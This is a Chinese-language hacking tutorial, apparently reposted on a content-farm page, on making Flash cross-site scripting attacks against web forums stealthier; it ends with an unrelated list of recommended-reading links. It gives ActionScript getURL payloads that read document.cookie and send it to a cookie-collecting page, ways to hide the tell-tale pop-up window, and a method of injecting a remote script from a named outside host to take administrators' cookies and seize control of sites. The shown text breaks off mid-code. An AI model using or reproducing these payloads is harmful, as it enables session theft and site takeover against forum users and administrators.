作者：五月 整理
前些天一直忙著學習WIN32匯編 ， 一直懶得寫文章 ， 這些天來好像Flash跨站攻擊鬧的挺兇的 ， 但在實施Flash跨站攻擊時的那個彈出的IE窗口很容易引起別人的懷疑 ， 而使得Flash跨站攻擊失敗 ， 這的確讓人多少有點頭疼 ， 大家是不是也一直在尋找實施Flash跨站攻擊時不彈出IE窗口的方法來隱藏自己的攻擊行為呢?下面大家和我一起來解決這個不大不小的問題 ， 讓Flash跨站攻擊更完美吧!
一般來說大家在進行Flash跨站攻擊時都是自己做一個Flash動畫 ， 并在第一幀中加入用于跳轉(zhuǎn)到其他URL的AtionScript腳本函數(shù) ， 如下:
getURL("JavaScript:window.open("http://用于收集Cookie的網(wǎng)頁地址?" document.cookie)","_self")
然后把這個Flash動畫置于論壇中的簽名、貼子或短信消息中 ， 用來獲得管理員或用戶的Cookie ， 從而得到管理權(quán)限 ， 進一步伺機控制整個站點,最終達到自己的目的 。我們可以看到在整個跨站攻擊中最重要的就是這個AtionScript腳本啦!也就是這個腳本中用到的代碼打開了一個我們又愛又恨的窗口 ， 所以我們也只能從改造這個腳本代碼來實現(xiàn)隱藏或者是去掉彈出的IE窗口 ， 除此外別無它法!
我們先分析一下上面的AtionScript腳本 ， 它使用AtionScript腳本函數(shù)"getURL"跳轉(zhuǎn)到一個使用JavaScript協(xié)議的URL(JavaScript協(xié)議后面就是我們非常熟悉的JavaScript腳本代碼) ， 在JavaScript中使用document.cookie的到Cookie ， 并把Cookie和一個用于收集Cookie的網(wǎng)頁地址連成一個http協(xié)議的URL地址 ， 最后使用window.open打開合成的URL地址 ， 從而把Cookie用GET方式發(fā)送到用于收集Cookie的網(wǎng)頁 ， 并記錄下來 。
通過上面的分析我們進一步了解那個彈出的IE窗口是由于JavaScript協(xié)議中的代碼window.open所生成的 ， 相信大家都知道window.open的第二個參數(shù)用來指定打開的窗口的名字 ， 其通用名稱有"_media (IE6.0 在瀏覽器左邊的媒體面板內(nèi)打開)"、"_blank (在新窗口中打開)"、"_parent (在當前框架的父框架內(nèi)打開 。假如當前框架無父框架 ， 此參數(shù)值等同于 _self)"、"_search (IE5.0 在瀏覽器左邊的搜索面板內(nèi)打開)"、"_self(在當前窗口中打開 ， 覆蓋當前文檔)"、"_top (在所有框架之外的最頂層窗口中打開。假如當前窗口無框架結(jié)構(gòu) ， 此參數(shù)值等同于 _self )"等幾種 ， 如果我們以"_search"來打開窗口 ， 不是就沒有了彈出的IE窗口了嗎?AtionScript腳本改為:
getURL("JavaScript:window.open("http://用于收集Cookie的網(wǎng)頁地址?" document.cookie,"_search")","_self")
當然 ， 這樣做會打開搜索面板 ， 也會引起懷疑 ， 但卻可以躲過那些關(guān)閉彈出窗口軟件的追殺!姑且也算一種方法吧!
如果僅僅是上面所說的 ， 相信不少讀者要把我 。。。。。。
看到這里聰明的你是不是想到了點解決的思路?對!既然支持JavaScript啦 ， 還有啥東東會不能解決呢?JavaScript真的是好處多多呀!
如果你曾看了我的那篇"打造一個完美的IE網(wǎng)頁木馬"的文章 ， 并且你對其中的代碼深深理解的話 ， 你可以自己先去想象一下啦!呵呵......
在那篇文章中有下面這樣一段代碼:
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(///g,"http://");
window.open("file:javascript:document.all.tags("SCRIPT")[0].src="" jsurl "";eval();","icyfoxlovelace");
使用了javascript協(xié)議把自己網(wǎng)站上的一個js代碼文件插入到了本地文件中 ， 同樣的道理我們也可以用它把一個js代碼文件插入到進行跨站攻擊的論壇網(wǎng)頁中 ， 相應的AtionScript腳本改為:
getURL("JavaScript:document.all.tags("SCRIPT")[0].src="http://www.godog.y365.com/wodemuma/icyfox.js";eval();","_self")
其中icyfox.js得內(nèi)容如下:
cookieurl="http://用于收集Cookie的網(wǎng)頁地址?cookie=" escape(document.cookie);

推薦閱讀

• 

  怎么把照片導入蘋果手機 如何把照片導入蘋果手機
• 

  水蟻會變成白蟻嗎
• 

  artset怎么付費解鎖
• 

  錫紙可以保溫嗎
• 

  潤唇膏孕婦能用嗎
• 

  朱芳雨個人資料
• 

  養(yǎng)花的最高境界：走火入魔！
• 

  夢見手被劃破 夢見手被劃破流血是什么意思
• 

  養(yǎng)護植物方法 喜歡植物的人看過來
• 

  程序化結(jié)構(gòu)設(shè)計語言中的三種基本結(jié)構(gòu)是什么
• 

  分享百度翻譯中英語發(fā)音設(shè)置如何切換成英式發(fā)音
• 

  廣州到重慶北的高鐵票價多少，廣州到重慶還有多少票
• 

  考研四個月來得及嗎
• 

  夜世界氣球兵有用嗎
• 

  教你華為爐石卡包怎么領(lǐng)取。
• 

  重慶長安歐諾二手車，二手長安歐諾201413l2萬公里多少錢 萬州

• 夏季如何做好雞的防暑降溫
• qq如何管理第三方應用授權(quán)權(quán)限
• wps如何設(shè)置下劃線 wps如何設(shè)置下劃線粗細
• 蘋果11如何關(guān)機
• wps中怎樣設(shè)置腳注 wps如何設(shè)置腳注
• iPhone無線耳機怎么看電量 iphone無線耳機如何看電量
• wps如何刪除空白部分
• 華為怎么把應用設(shè)置為信任應用 華為如何信任應用程序
• wps表格怎么刪除橫線 wps如何刪除表格中的橫線
• 華為如何取消懸浮球 華為如何取消懸浮球功能